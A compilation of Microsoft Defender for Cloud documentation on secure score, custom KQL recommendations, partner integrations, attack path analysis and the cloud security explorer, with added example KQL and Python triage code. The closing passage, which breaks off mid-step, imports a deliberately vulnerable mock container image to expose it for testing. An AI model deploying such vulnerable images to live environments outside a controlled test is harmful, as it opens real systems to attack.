[Screenshot: Microsoft Defender for Cloud | Workbooks | Secure Score Over Time (64 subscriptions). The report includes "Top recommendations with recent increase in unhealthy resources", for example "Disk encryption should be applied on virtual machines" (32, 20%) and "Vulnerabilities in security configuration on your machines should..." (27, 10%), each linked to its security control.]

Power BI Pro dashboards


If you're a Power BI user with a Pro account, you can use the Secure Score Over Time Power BI dashboard to track your secure score over time and investigate any changes.


Tip

You can find this dashboard, as well as other tools for working programmatically with secure score, in the dedicated area of the Microsoft Defender for Cloud community on GitHub: https://github.com/Azure/Azure-Security-Center/tree/master/Secure%20Score


The dashboard contains the following two reports to help you analyze your security status:

• Resources Summary - provides summarized data regarding your resources' health.

• Secure Score Summary - provides summarized data regarding your score progress. Use the "Secure score over time per subscription" chart to view changes in the score. If you notice a dramatic change in your score, check the "detected changes that may affect your secure score" table for possible changes that could have caused it. This table presents deleted resources, newly deployed resources, or resources whose security status changed for one of the recommendations.


[Screenshot: Secure Score Summary report in Power BI (version v2). Sections: Aggregated score for all subscriptions (current aggregated secure score 40) with Aggregated secure score over time; Over time tracking with "Secure score over time per subscription (top 60 subscriptions)"; Score trends per subscription (full subscription name, current %score, 7 days change, 30 days change; for example Partner-Managed-Subscription 6.67% / 0.00%); "Detected changes that may affect your secure score", listing per date (October 2020) security status changes, new resources and deleted resources, with the note "It may take up to 24 hours for changes to appear in the detected changes"; and Controls score over time by control name (average of %score).]


This article described how to access and track your secure score. For related material, see the following articles:

• Learn about the different elements of a recommendation

• Learn how to remediate recommendations

• View the GitHub-based tools for working programmatically with secure score


Create custom recommendations and security standards

Article • 08/03/2023

Recommendations give you suggestions on how to better secure your resources. Security standards contain comprehensive sets of security recommendations to help secure your cloud environments.


Security teams can use the readily available recommendations and regulatory standards and can also create their own custom recommendations and standards to meet specific internal requirements in their organization.


Microsoft Defender for Cloud provides the option of creating custom recommendations 
and standards for AWS and GCP using KQL queries. You can use a query editor to build 
and test queries over your data. 


There are three elements involved when creating and managing custom recommendations:

• Recommendation - contains:
  o Recommendation details (name, description, severity, remediation logic, etc.)
  o Recommendation logic in KQL.
  o The standard it belongs to.
• Standard - defines a set of recommendations.
• Standard assignment - defines the scope that the standard evaluates (for example, specific AWS accounts).


Prerequisites

Aspect                                          Details
Required/preferred environmental requirements   This preview includes only AWS and GCP recommendations. This feature will be part of the Defender CSPM plan in the future.
Required roles & permissions                    Security Admin
Clouds                                          Commercial clouds: supported. National clouds (Azure Government, Microsoft Azure operated by 21Vianet): not supported.


Create a custom recommendation 
1. In Microsoft Defender for Cloud, select Environment Settings. 
2. Select the relevant account / project. 


3. Select Standards. 
4. Select Create and then select Recommendation. 


[Screenshot: Environment settings > Settings | Standards for the selected account, with Search, Refresh and a Create button offering Standard and Recommendation; the Standards pane ("Security standards contain comprehensive...") lists 14 items.]


5. Fill in the recommendation details (for example: name, severity) and select the 
standard/s you'd like to add this recommendation to. 


[Screenshot: Create custom recommendation wizard, step 1 "Recommendation details": Name (required), Description, Remediation description, Severity (required), Standards.]


6. Write a KQL query that defines the recommendation logic. You can write the query 
in the "recommendation query" text box or use the query editor. 


[Screenshot: Create custom recommendation - Recommendation query step, with the recommendation query text box and the option to open the query editor] 


7. Select Next and review the recommendation details. 


[Screenshot: Create custom recommendation - Review and create step, summarizing Name, Description, Remediation description, Severity and Standards] 


8. Select Save. 


Create a custom standard 


1. In Microsoft Defender for Cloud, select Environment Settings. 
2. Select the relevant account / project. 
3. Select Standards. 
4. Select Add and then select Standard. 


[Screenshot: Environment settings > Settings | Standards, showing the list of security standards for the selected account] 


5. Fill in a name and description and select the recommendation you want to be 
included in this standard. 


[Screenshot: Add Standard pane - Scope, choice between Existing standard and New standard, Name, Description and Assessments fields] 


6. Select Save; the new standard will now be assigned to the account/project you've 
created it in. You can assign the same standard to other accounts / projects that 
you have Contributor and up access to. 


Create new queries using the query editor 


In the query editor you have the ability to run your queries over your raw data (native 
API calls). To create a new query using the query editor, select the 'open query editor' 
button. The editor will contain data on all the native APIs we support to help build the 
queries. The data appears in the same structure as in the API. You can view the results of 
your query in the Results pane. The How to tab gives you step by step instructions for 
building your query. 


[Screenshot: Custom recommendations (preview) query editor, with the Categories and Tables panes, the Run query button and the Results pane, showing the example query below] 


Kusto 


// Here is an example query with instructions, to help you get started with writing your queries 
// The recommendation in this example is: "Stopped EC2 instances should be removed after a specified time period" 
// Start the query with the table name - "RawEntityMetadata" 
RawEntityMetadata 
// Write the cloud name and resource type. You can choose the resource type in the "categories" tab. 
| where Environment == 'AWS' and Identifiers.Type == 'ec2.instance' 
// Write the relevant rows for your query: 
| extend State = tolower(tostring(Record.State.Name.Value)) 
| extend StoppedTime = todatetime(tostring(Record.StateTransitionReason)) 
// Define condition which determine if the resource is healthy/unhealthy - keep this row as it is and edit only the condition: 
| extend HealthStatus = iff(not(State == 'stopped' and StoppedTime < ago(30d)), 'HEALTHY', 'UNHEALTHY') 
// Return all the original columns - keep this row as it is: 
| project Id, Name, Environment, Identifiers, AdditionalData, Record, HealthStatus 


Steps for building a query 


1. The first row of the query should include the environment and resource type. For 
example: | where Environment == 'AWS' and Identifiers.Type == 'ec2.instance' 

2. The query must contain an "iff" statement that defines the healthy or unhealthy 
conditions. Use this template and edit only the "condition": 
| extend HealthStatus = iff(condition, 'UNHEALTHY', 'HEALTHY') 

3. The last row should return all the original columns: 
| project Id, Name, Environment, Identifiers, AdditionalData, Record, HealthStatus 


Note 


The Record field contains the data structure as it is returned from the AWS / 
GCP API. Use this field to define conditions which will determine if the 
resource is healthy or unhealthy. 

You can access internal properties of the Record field using a dot notation. 
For example: | extend EncryptionType = Record.Encryption.Type 


Additional instructions 


- No need to filter records by Timespan. The assessment service filters the most 
recent records on each run. 

- No need to filter by resource ARN, unless intended. The assessment service will run 
the query on assigned resources. 

- If a specific scope is filtered in the assessment query (for example: specific account 
ID), it will apply on all resources assigned to this query. 

- Currently it is not possible to create one recommendation for multiple 
environments. 
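As an added example that is not part of the Microsoft documentation, the following custom recommendation flags EC2 instances that still accept IMDSv1, following the three-row structure described above (environment and resource type, the iff condition, the project row). It assumes, as the page states, that Record mirrors the native EC2 API response, so the path Record.MetadataOptions.HttpTokens.Value (an assumption; this path is not shown on the page) carries "optional" or "required".

```kusto
// Added example: "EC2 instances should require IMDSv2" (not a query from the page).
// Assumption: Record mirrors the EC2 DescribeInstances response, so
// Record.MetadataOptions.HttpTokens.Value is "optional" (IMDSv1 allowed) or "required".
RawEntityMetadata
// Environment and resource type, as in the page's template.
| where Environment == 'AWS' and Identifiers.Type == 'ec2.instance'
| extend State = tolower(tostring(Record.State.Name.Value))
| extend HttpTokensRaw = tolower(tostring(Record.MetadataOptions.HttpTokens.Value))
// Instances launched without explicit metadata options report no value;
// AWS treats that as "optional", so normalize the empty string to it.
| extend HttpTokens = iff(isempty(HttpTokensRaw), 'optional', HttpTokensRaw)
// Condition: a non-terminated instance that does not require session tokens is UNHEALTHY.
// Requiring tokens is the posture control that limits credential theft through the
// instance metadata service; terminated instances are ignored so they do not linger as findings.
| extend HealthStatus = iff(State != 'terminated' and HttpTokens != 'required', 'UNHEALTHY', 'HEALTHY')
// Keep this row as it is: return all the original columns.
| project Id, Name, Environment, Identifiers, AdditionalData, Record, HealthStatus
```

Paste it into the recommendation query box or the query editor and check the Results pane for the HealthStatus column before saving.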


Next steps 


You can use the following links to learn more about Kusto queries: 


KQL Quick Reference 
Kusto Query Language (KQL) overview 
Must Learn KQL Part 1: Tools and Resources 
What are security policies, initiatives, and recommendations? 


Protect Windows Admin Center resources with Microsoft Defender for Cloud 


Article - 06/14/2023 


Windows Admin Center is a management tool for your Windows servers. It's a single 
location for system administrators to access the most commonly used admin tools. 
From within Windows Admin Center, you can directly onboard your on-premises servers 
into Microsoft Defender for Cloud. You can then view a summary of your security 
recommendations and alerts directly in the Windows Admin Center experience. 


When you've successfully onboarded a server from Windows Admin Center to Microsoft 
Defender for Cloud, you can: 


- View security alerts and recommendations inside the Defender for Cloud extension 
in Windows Admin Center. 

- View the security posture and retrieve other detailed information of your Windows 
Admin Center managed servers in Defender for Cloud within the Azure portal (or 
via an API). 


Through the combination of these two tools, Defender for Cloud becomes your single 
pane of glass to view all your security information, whatever the resource: protecting 
your Windows Admin Center managed on-premises servers, your VMs, and any other 
PaaS workloads. 


Onboard Windows Admin Center managed servers into Defender for Cloud 


1. From Windows Admin Center, select one of your servers, and in the Tools pane, 
select the Microsoft Defender for Cloud extension: 


[Screenshot: Windows Admin Center Server Manager - Tools pane, with the Microsoft Defender for Cloud extension listed under Extensions] 


Note 


If the server is already onboarded to Defender for Cloud, the set-up window 
will not appear. 


2. Select Sign in to Azure and set up. 


[Screenshot: "Secure your Server with Microsoft Defender for Cloud - Start a 30-day free trial" set-up window, with the "Sign in to Azure and set up" button] 


3. Follow the instructions to connect your server to Defender for Cloud. After you've 
entered the necessary details and confirmed, Defender for Cloud makes the 
necessary configuration changes to ensure that all of the following are true: 


- An Azure Gateway is registered. 

- The server has a workspace to report to and an associated subscription. 

- Defender for Cloud's Log Analytics solution is enabled on the workspace. This 
solution provides Microsoft Defender for Cloud's features for all servers and 
virtual machines reporting to this workspace. 

- Microsoft Defender for Servers is enabled on the subscription. 

- The Log Analytics agent is installed on the server and configured to report to 
the selected workspace. If the server already reports to another workspace, 
it's configured to report to the newly selected workspace as well. 


Note 


It may take some time after onboarding for recommendations to appear. In 
fact, depending on your server activity you may not receive any alerts. To 
generate test alerts and confirm that your alerts are working correctly, follow the 
instructions in the alert validation procedure. 


View security recommendations and alerts in Windows Admin Center 


Once onboarded, you can view your alerts and recommendations directly in the 
Microsoft Defender for Cloud area of Windows Admin Center. Select a recommendation 
or an alert to view them in the Azure portal. There, you'll get additional information and 
learn how to remediate issues. 


[Screenshot: Microsoft Defender for Cloud (preview) area in Windows Admin Center, showing the server as protected, recommendations by low/medium/high severity, and a "Microsoft Defender for Cloud test alert (not a threat)"] 


View security recommendations and alerts for Windows Admin Center managed servers in Defender for Cloud 


From Microsoft Defender for Cloud: 


- To view security recommendations for all your Windows Admin Center servers, 
open asset inventory, select the VMs and Computers tab, and filter to the machine 
type that you want to investigate. 

- To view security alerts for all your Windows Admin Center servers, open Security 
alerts. Select Filter and ensure only "Non-Azure" is selected: 


[Screenshot: Microsoft Defender for Cloud | Security alerts page, with the Filter, Download csv report and Suppression rules (preview) options] 


Next steps 


Integrate security solutions in Microsoft Defender for Cloud 
Integrate security solutions in Microsoft Defender for Cloud 


Article - 01/24/2023 


This document helps you to manage security solutions already connected to Microsoft 
Defender for Cloud and add new ones. 


Integrated Azure security solutions 


Defender for Cloud makes it easy to enable integrated security solutions in Azure. 
Benefits include: 


- Simplified deployment: Defender for Cloud offers streamlined provisioning of 
integrated partner solutions. For solutions like antimalware and vulnerability 
assessment, Defender for Cloud can provision the agent on your virtual machines. 
For firewall appliances, Defender for Cloud can take care of much of the network 
configuration required. 

- Integrated detections: Security events from partner solutions are automatically 
collected, aggregated, and displayed as part of Defender for Cloud alerts and 
incidents. These events are also fused with detections from other sources to 
provide advanced threat-detection capabilities. 

- Unified health monitoring and management: Customers can use integrated 
health events to monitor all partner solutions at a glance. Basic management is 
available, with easy access to advanced setup by using the partner solution. 


Currently, integrated security solutions include vulnerability assessment by Qualys and 
Rapid7. 


Note 


Defender for Cloud does not install the Log Analytics agent on partner virtual 
appliances because most security vendors prohibit external agents running on their 
appliances. 


Learn more about the integration of vulnerability scanning tools from Qualys, including 
a built-in scanner available to customers that enable Microsoft Defender for Servers. 


Defender for Cloud also offers vulnerability analysis for your: 


- SQL databases - Explore vulnerability assessment reports in the vulnerability 
assessment dashboard 

- Azure Container Registry images - Use Microsoft Defender for container registries 
to scan your images for vulnerabilities 

- Amazon AWS Elastic Container Registry images - Use Microsoft Defender for 
container registries to scan your images for vulnerabilities 


How security solutions are integrated 


Azure security solutions that are deployed from Defender for Cloud are automatically 
connected. You can also connect other security data sources, including computers 
running on-premises or in other clouds. 


[Screenshot: Microsoft Defender for Cloud | Security solutions page. The Connected solutions section lists a Check Point next generation firewall, a Barracuda web application firewall, a Qualys vulnerability assessment solution and a Microsoft WAF with their health status; the Add data sources section offers Non-Azure servers, SIEM and Azure Application Gateway WAF] 


Manage integrated Azure security solutions and other data sources 


1. From the Azure portal, open Defender for Cloud. 
2. From Defender for Cloud's menu, select Security solutions. 


From the Security solutions page, you can see the health of integrated Azure security 
solutions and run basic management tasks. 


Connected solutions 


The Connected solutions section includes security solutions that are currently 
connected to Defender for Cloud. It also shows the health status of each solution. 


[Screenshot: Connected solutions (4) section, listing each connected solution with its vendor, type (Next Generation Firewall, SaaS-based Web Application Firewall, Web Application Firewall, Vulnerability Assessment), health status (Stopped reporting, Not reported, Healthy) and a VIEW link] 


The status of a security solution can be: 


- Healthy (green) - no health issues. 

- Unhealthy (red) - there's a health issue that requires immediate attention. 

- Stopped reporting (orange) - the solution has stopped reporting its health. 

- Not reported (gray) - the solution hasn't reported anything yet and no health data 
is available. A solution's status may be unreported if it was connected recently and 
is still deploying. 


Note 


If health status data is not available, Defender for Cloud shows the date and time of 
the last event received to indicate whether the solution is reporting or not. If no 
health data is available and no alerts were received within the last 14 days, 
Defender for Cloud indicates that the solution is unhealthy or not reporting. 


Select VIEW for additional information and options such as: 


- Solution console - Opens the management experience for this solution. 

- Link VM - Opens the Link Applications page. Here you can connect resources to 
the partner solution. 

- Delete solution 

- Configure 


[Screenshot: Qualys solution page under Security solutions, with the Solution console, Link VM, Delete solution and Configure actions; it shows the partner solution name (Qualys for Azure), type (Vulnerability Assessment), integration mode (Semi-automatically provisioned), status (Healthy), a note that agent status may have up to 8 hours delay, and the associated resources with their health] 


Discovered solutions 


Defender for Cloud automatically discovers security solutions running in Azure but not 
connected to Defender for Cloud and displays the solutions in the Discovered solutions 
section. These solutions include Azure solutions, like Azure AD Identity Protection, and 
partner solutions. 


Note 


Enable advanced protections at the subscription level for the discovered solutions 
feature. Learn more in Quickstart: Enable enhanced security features. 


Select CONNECT under a solution to integrate with Defender for Cloud and be notified 
of security alerts. 


Add data sources 


The Add data sources section includes other available data sources that can be 
connected. For instructions on adding data from any of these sources, select ADD. 


[Screenshot: Add data sources (3) section, offering Non-Azure servers (onboard your non-Azure computers), SIEM (integrate alerts into a SIEM for central monitoring) and Azure Application Gateway WAF (WAF security alerts shown in the alerts queue), each with an ADD button] 


Next steps 


In this article, you learned how to integrate partner solutions in Defender for Cloud. To 
learn how to set up an integration with Microsoft Sentinel, or any other SIEM, see 
Continuously export Defender for Cloud data. 


Identify and remediate attack paths 


Defender for Cloud's contextual security capabilities assist security teams in reducing 
the risk of impactful breaches. Defender for Cloud uses environment context to perform 
a risk assessment of your security issues. Defender for Cloud identifies the biggest 
security risk issues, while distinguishing them from less risky issues. 


Attack path analysis helps you to address the security issues that pose immediate 
threats with the greatest potential of being exploited in your environment. Defender for 
Cloud analyzes which security issues are part of potential attack paths that attackers 
could use to breach your environment. It also highlights the security recommendations 
that need to be resolved in order to mitigate those attack paths. 


You can check out the full list of Attack path names and descriptions. 


Availability 


Aspect                         | Details 
Release state                  | GA (General Availability) for Azure, AWS; Preview for GCP 
Prerequisites                  | - Enable agentless scanning, or Enable Defender for Server P1 (which includes MDVM) or Defender for Server P2 (which includes MDVM and Qualys). 
                               | - Enable Defender CSPM 
                               | - Enable agentless container posture extension in Defender CSPM, or Enable Defender for Containers, and install the relevant agents in order to view attack paths that are related to containers. This also gives you the ability to query containers data plane workloads in security explorer. 
Required plans                 | Defender Cloud Security Posture Management (CSPM) enabled 
Required roles and permissions | Security Reader, Security Admin, Reader, Contributor, Owner 
Clouds                         | Supported: Commercial clouds (Azure, AWS, GCP). Not supported: National (Azure Government, Azure China 21Vianet) 


Features of the attack path overview page 


The attack path page shows you an overview of all of your attack paths. You can also see 
your affected resources and a list of active attack paths. 


Attack paths 


Here you can see the open attack paths on the selected subscriptions. 


[Screenshot: Attack paths page showing the counts of total attack paths, affected resources and active recommendations, and a table of attack paths with columns Attack path, Environment, Paths count, Risk categories and Affected resources] 


On this page you can organize your attack paths based on name, environment, paths 
count, risk categories. 


For each attack path, you can see all of the risk categories and any affected resources. 


The potential risk categories include credentials exposure, compute abuse, data 
exposure, subscription and account takeover. 


Learn more about the cloud security graph, attack path analysis, and the cloud security 
explorer. 


Investigate and remediate attack paths 


You can use Attack path analysis to locate the biggest risks to your environment and to 
remediate them. 


To investigate and remediate an attack path: 

1. Sign in to the Azure portal. 

2. Navigate to Microsoft Defender for Cloud > Attack path analysis. 


[Screenshot: Microsoft Defender for Cloud | Overview page, with Attack path analysis in the left menu and the Attack paths count on the dashboard] 


3. Select an attack path. 


[Screenshot: Microsoft Defender for Cloud | Attack paths page, with the Attack path by category chart and a table listing, for example, "Internet exposed VM has high severity vulnerabilities and read permission to a Key Vault" (Azure, 1 path, Credentials exposure, Compute abuse) and "Internet exposed VM has high severity vulnerabilities" (Azure, 1 path, Compute abuse)] 


Note 


An attack path may have more than one path that is at risk. The path count 
will tell you how many paths need to be remediated. If the attack path has 
more than one path, you will need to select each path within that attack path 
to remediate all risks. 


4. Select a node. 


[Screenshot: attack path "Internet exposed VM has high severity vulnerabilities and read permission to a Key Vault". The left pane shows paths count, active recommendations, freshness interval (24:00:00), the potential impact, the resource types involved (virtual network, subnet, IP address), the risk categories (Credentials exposure, Compute abuse) and remediation steps. The graph shows the IP address routing traffic to the virtual network and subnet, then to virtual machine 'cmdemowin-01', which can authenticate as a managed identity with read permission to Key Vault 'cmdemokeyvault'] 


5. Select Insight to view the associated insights for that node. 


[Screenshot: node details for virtual machine 'cmdemowin-01', Insights tab: has high or critical severity vulnerabilities (detected by a vulnerability assessment solution, with a CVEs list), vulnerable to remote code execution, exposed to the internet] 


6. Select Recommendations. 


[Screenshot: node details for virtual machine 'cmdemowin-01', Recommendations tab, listing unhealthy recommendations: "All network ports should be restricted on network security groups associated to your virtual machine", "Machines should have vulnerability findings resolved" and "Management ports should be closed on your virtual machines"] 


7. Select a recommendation. 
8. Follow the remediation steps to remediate the recommendation. 


9. Select other nodes as necessary and view their insights and recommendations. 


Once an attack path is resolved, it can take up to 24 hours for an attack path to be 
removed from the list. 


View all recommendations with attack path 


Attack path analysis also gives you the ability to see all recommendations by attack path 
without having to check each node individually. You can resolve all recommendations 
without having to view each node individually. 


To resolve all recommendations: 

1. Sign in to the Azure portal. 
2. Navigate to Microsoft Defender for Cloud > Attack path analysis. 
3. Select an attack path. 
4. Select Recommendations. 


[Screenshot: attack path "Internet exposed VM has high severity vulnerabilities and read permission to a Key Vault", Recommendations tab: "Remediate the recommendations below to resolve in bulk all attack path instances", listing recommendations such as "Management ports should be closed on your virtual machines", "Machines should have vulnerability findings resolved", "Internet-facing virtual machines should be protected with network security groups" and "All network ports should be restricted on network security groups associated to your virtual machine", each with its count of unhealthy resources] 


5. Select a recommendation. 
6. Follow the remediation steps to remediate the recommendation. 


Once an attack path is resolved, it can take up to 24 hours for an attack path to be 
removed from the list. 


Consume attack path data programmatically using API 


You can consume attack path data programmatically by querying the Azure Resource Graph 
(ARG) API. Learn how to query ARG API. 


The following examples show sample ARG queries that you can run: 


Get all attack paths in subscription 'X': 


Kusto 


securityresources 
| where type == "microsoft.security/attackpaths" 
| where subscriptionId == "<SUBSCRIPTION_ID>" 


Get all instances for a specific attack path: For example, 'Internet exposed VM with high 
severity vulnerabilities and read permission to a Key Vault'. 


Kusto 


securityresources 
| where type == "microsoft.security/attackpaths" 
| where subscriptionId == "212f9889-769e-45ae-ab43-6da33674bd26" 
| extend AttackPathDisplayName = tostring(properties["displayName"]) 
| where AttackPathDisplayName == "<DISPLAY_NAME>" 


API response schema 


The following table lists the data fields returned from the API response: 


Field                                    Description
ID                                       The Azure resource ID of the attack path instance
Name                                     The unique identifier of the attack path instance
Type                                     The Azure resource type, always equals "microsoft.security/attackpaths"
Tenant ID                                The tenant ID of the attack path instance
Location                                 The location of the attack path
Subscription ID                          The subscription of the attack path
Properties.description                   The description of the attack path
Properties.displayName                   The display name of the attack path
Properties.attackPathType                The type of the attack path
Properties.manualRemediationSteps        Manual remediation steps of the attack path
Properties.refreshInterval               The refresh interval of the attack path
Properties.potentialImpact               The potential impact of the attack path being breached
Properties.riskCategories                The categories of risk of the attack path
Properties.entryPointEntityInternalID    The internal ID of the entry point entity of the attack path
Properties.targetEntityInternalID        The internal ID of the target entity of the attack path
Properties.assessments                   Mapping of entity internal ID to the security assessments on that entity
Properties.graphComponent                List of graph components representing the attack path
Properties.graphComponent.insights       List of insights graph components related to the attack path
Properties.graphComponent.entities       List of entities graph components related to the attack path
Properties.graphComponent.connections    List of connections graph components related to the attack path
Properties.AttackPathID                  The unique identifier of the attack path instance
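The ARG queries above return one record per attack path instance, shaped as in the schema table. The following is an added example (not Microsoft's code or part of any Defender for Cloud SDK) of triaging such records once they are fetched: it applies the same type and display-name filters as the two KQL queries, counts paths per risk category, and walks the graph component from the entry point entity to the target entity to render the path. The two records are constructed for the example; the top-level field names follow the schema table, while the sub-field names inside graphComponent (internalId, sourceInternalId, targetInternalId, displayName) are assumptions made for this example rather than documented names.

```python
"""Triage attack-path records returned by the Azure Resource Graph (ARG)
queries above.  Example code added to this page; it is not part of the
Defender for Cloud product or its SDK."""
import json
from collections import Counter, deque

# Constructed sample of two records shaped like the ARG response for
# microsoft.security/attackpaths (not real data).  Top-level fields follow the
# API response schema; the sub-field names inside graphComponent are assumptions.
SAMPLE_ARG_RESPONSE = json.loads("""
{"data": [
 {"id": "/subscriptions/<SUBSCRIPTION_ID>/providers/Microsoft.Security/attackPaths/ap-001",
  "name": "ap-001", "type": "microsoft.security/attackpaths",
  "subscriptionId": "<SUBSCRIPTION_ID>",
  "properties": {
    "displayName": "Internet exposed VM with high severity vulnerabilities and read permission to a Key Vault",
    "riskCategories": ["Credential exposure", "Compute abuse"],
    "manualRemediationSteps": ["Remediate vulnerabilities on the VM",
                               "Remove the identity's read permission on the Key Vault"],
    "entryPointEntityInternalID": "e1", "targetEntityInternalID": "e3",
    "graphComponent": {
      "entities": [{"internalId": "e1", "displayName": "web-vm-01"},
                   {"internalId": "e2", "displayName": "web-vm-01-identity"},
                   {"internalId": "e3", "displayName": "kv-prod"}],
      "connections": [{"sourceInternalId": "e1", "targetInternalId": "e2", "displayName": "has identity"},
                      {"sourceInternalId": "e2", "targetInternalId": "e3", "displayName": "can read secrets of"}],
      "insights": [{"internalId": "e1", "displayName": "Exposed to the internet"}]}}},
 {"id": "/subscriptions/<SUBSCRIPTION_ID>/providers/Microsoft.Security/attackPaths/ap-002",
  "name": "ap-002", "type": "microsoft.security/attackpaths",
  "subscriptionId": "<SUBSCRIPTION_ID>",
  "properties": {
    "displayName": "Internet exposed VM has high severity vulnerabilities",
    "riskCategories": ["Compute abuse"],
    "manualRemediationSteps": ["Remediate vulnerabilities on the VM"],
    "entryPointEntityInternalID": "e9", "targetEntityInternalID": "e9",
    "graphComponent": {
      "entities": [{"internalId": "e9", "displayName": "app-vm-02"}],
      "connections": [],
      "insights": [{"internalId": "e9", "displayName": "Exposed to the internet"}]}}}
]}
""")


def attack_paths(response):
    """Keep only attack-path records (the `where type == ...` clause of the KQL)."""
    return [r for r in response["data"] if r.get("type") == "microsoft.security/attackpaths"]


def filter_by_display_name(records, display_name):
    """Equivalent of the second KQL query: all instances of one named attack path."""
    return [r for r in records if r["properties"].get("displayName") == display_name]


def count_by_risk_category(records):
    """How many attack paths fall into each risk category (a path can be in several)."""
    counter = Counter()
    for r in records:
        counter.update(r["properties"].get("riskCategories", []))
    return counter


def render_path(record):
    """Breadth-first walk over the connections from the entry point entity to the
    target entity; returns readable text, or None if the target is unreachable."""
    props = record["properties"]
    graph = props["graphComponent"]
    names = {e["internalId"]: e["displayName"] for e in graph["entities"]}
    edges = {}
    for c in graph["connections"]:
        edges.setdefault(c["sourceInternalId"], []).append((c["targetInternalId"], c["displayName"]))
    start, goal = props["entryPointEntityInternalID"], props["targetEntityInternalID"]
    queue = deque([(start, [])])   # (node, list of (next_node, edge_label) that led here)
    seen = {start}
    while queue:
        node, trail = queue.popleft()
        if node == goal:
            text = names[start]
            for nxt, label in trail:
                text += f" -[{label}]-> {names[nxt]}"
            return text
        for nxt, label in edges.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, trail + [(nxt, label)]))
    return None


if __name__ == "__main__":
    paths = attack_paths(SAMPLE_ARG_RESPONSE)
    print(count_by_risk_category(paths))
    for p in paths:
        print(p["name"], "::", render_path(p))
        for step in p["properties"]["manualRemediationSteps"]:
            print("   remediation:", step)
```

The rendered path string (entry point first, target last, one edge label per hop) is what a responder usually wants next to the remediation steps, because breaking any one hop breaks the path.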


External attack surface management (EASM) 


An external attack surface is the entire area of an organization or system that is
susceptible to an attack from an external source. An organization's attack surface is
made up of all the points of access that an unauthorized person could use to enter its
system. The larger your attack surface is, the harder it is to protect.


While you're investigating and remediating an attack path, you can also view your EASM
if it's available and if you've enabled Defender EASM on your subscription.

Note

To manage your EASM, you must deploy the Defender EASM Azure resource to
your subscription. Defender EASM has its own cost and is separate from Defender
for Cloud. To learn more about Defender EASM pricing options, check out the
pricing page.


To manage your EASM:

1. Sign in to the Azure portal.
2. Navigate to Microsoft Defender for Cloud > Attack path analysis.
3. Select an attack path.
4. Select a resource.
5. Select Insights.
6. Select Open EASM.
7. Follow the Using and managing discovery instructions.


Next Steps 


Learn how to build queries with cloud security explorer. 




Build queries with cloud security explorer

Defender for Cloud's contextual security capabilities assist security teams in reducing
the risk of impactful breaches. Defender for Cloud uses environmental context to
perform a risk assessment of your security issues, identifies the biggest security risks,
and distinguishes them from less risky issues.


Use the cloud security explorer to proactively identify security risks in your cloud
environment by running graph-based queries on the cloud security graph, which is
Defender for Cloud's context engine. You can prioritize your security team's concerns
while taking your organization's specific context and conventions into account.


With the cloud security explorer, you can query all of your security issues and
environment context such as assets inventory, exposure to the internet, permissions, and
lateral movement between resources and across multiple clouds (Azure, AWS, and GCP).

Learn more about the cloud security graph, attack path analysis, and the cloud security
explorer.


Availability

Aspect                          Details
Release state                   GA (General Availability)
Required plans                  - Defender Cloud Security Posture Management (CSPM) enabled
                                - Defender for Servers P2 customers can use the explorer UI to query for
                                  keys and secrets, but must have Defender CSPM enabled to get the full
                                  value of the Explorer.
Required roles and permissions  - Security Reader
                                - Security Admin
                                - Reader
                                - Contributor
                                - Owner
Clouds                          © Commercial clouds (Azure, AWS)
                                * Commercial clouds (GCP)
                                * National (Azure Government, Microsoft Azure operated by 21Vianet)


Prerequisites 


- You must enable Defender CSPM.
  - For agentless container posture, you must enable the following extensions:
    - Agentless discovery for Kubernetes (preview)
    - Container registries vulnerability assessments (preview)
- You must enable agentless scanning.
- Required roles and permissions:
  - Security Reader
  - Security Admin
  - Reader
  - Contributor
  - Owner


Check the cloud availability tables to see which government and cloud environments are 
supported. 


Build a query with the cloud security explorer 


The cloud security explorer allows you to build queries that can proactively hunt for 
security risks in your environments with dynamic and efficient features such as: 


- Multi-cloud and multi-resource queries - The entity selection control filters are
  grouped and combined into logical control categories to assist you in building
  queries across cloud environments and across resources simultaneously.
- Custom Search - Use the dropdown menus to apply filters to build your query.
- Query templates - Use any of the available prebuilt query templates to more
  efficiently build your query.
- Share query link - Copy and share a link of your query with other people.

To build a query:

1. Sign in to the Azure portal.
2. Navigate to Microsoft Defender for Cloud > Cloud Security Explorer.




3. Search for and select a resource from the drop-down menu. 




4. Select + to add other filters to your query. 



5. Add subfilters as needed. 


6. After building your query, select Search to run the query. 




If you want to save a copy of your results locally, you can select the Download CSV 
report button to save a copy of your search results as a CSV file. 




Query templates 


Query templates are preformatted searches using commonly used filters. Use one of the 
existing query templates from the bottom of the page by selecting Open query. 




You can modify any template to search for specific results by changing the query and 
selecting Search. 


Share a query 


Use the query link to share a query with other people. After creating a query, select 
Share query link. The link is copied to your clipboard. 




Next steps 


View the reference list of attack paths and cloud security graph components. 


Learn about the Defender CSPM plan options. 


Testing the Attack Path and Security Explorer using a vulnerable container image

Observing potential threats in the attack path experience


Attack path analysis is a graph-based algorithm that scans the cloud security graph. The
scans expose exploitable paths that attackers may use to breach your environment and
reach your high-impact assets. Attack path analysis exposes attack paths and suggests
recommendations on how best to remediate the issues that break the attack path and
prevent a successful breach.


Explore and investigate attack paths by sorting them based on name, environment, path
count, and risk categories. Explore cloud security graph Insights on the resource.
Examples of Insight types are:

- Pod exposed to the internet
- Privileged container
- Pod uses host network
- Container image is vulnerable to remote code execution


Testing the attack path and security explorer using a mock vulnerable container image


If there are no entries in the list of attack paths, you can still test this feature by using a 
mock container image. Use the following steps to set up the test: 


Requirement: An instance of Azure Container Registry (ACR) in the tested scope.

1. Import a mock vulnerable image to your Azure Container Registry:

   a. Run the following command in Cloud Shell:

      az acr import --name $MYACR --source DCSPMtesting.azurecr.io/mdc-mock-0001 --image mdc-mock-0001

   b. If your AKS isn't attached to your ACR, use the following Cloud Shell command
      line to point your AKS instance to pull images from the selected ACR:

      az aks update -n myAKSCluster -g myResourceGroup --attach-acr <acr-name>

2. Authenticate your Cloud Shell session to work with the cluster:

   az aks get-credentials --subscription <cluster-suid> --resource-group <your-rg> --name <your-cluster-name>

3. Verify success by doing the following steps:

   - Look for an entry with mdc-dcspm-demo as namespace.
   - In the Workloads -> Deployments tab, verify "pod" created 3/3 and
     dcspmcharts-ingress-nginx-controller 1/1.
   - In Services and ingresses, look for the services: service, dcspmcharts-ingress-nginx-controller
     and dcspmcharts-ingress-nginx-controller-admission. In the Ingress tab, verify one
     ingress is created with an IP address and nginx class.

4. Deploy the mock vulnerable image to expose the vulnerable container to the
   internet by running the following command:

